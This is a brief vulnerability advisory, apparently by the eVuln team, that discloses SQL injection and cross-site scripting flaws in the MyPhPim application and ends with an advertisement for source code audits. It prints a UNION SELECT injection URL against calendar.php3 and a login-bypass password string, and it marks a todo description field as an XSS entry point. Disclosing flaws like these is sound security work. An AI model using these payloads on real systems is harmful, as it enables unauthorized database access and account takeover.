PoC/Exploit for Multiple SQL Injection and XSS in MyPhPim

Published Proof of Concept code - Multiple SQL Injection and XSS in MyPhPim.

Description
Available
Solution
Not available - check vendor's website

SQL Injection Examples:

URL: http://host/myphpim/calendar.php3? menu=detail&cal_id=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

Login page:
login: [first registered user]
pass: a") or "a"="a"/*

Cross-Site Scripting Example

Create New todo For [user] Page:
Description value: <XSS>

Order Source Code Audit made by eVuln team

Defend against hacking by source code review of your site made by eVuln team.The work will be done by experts in website security.

Advisories by vuln type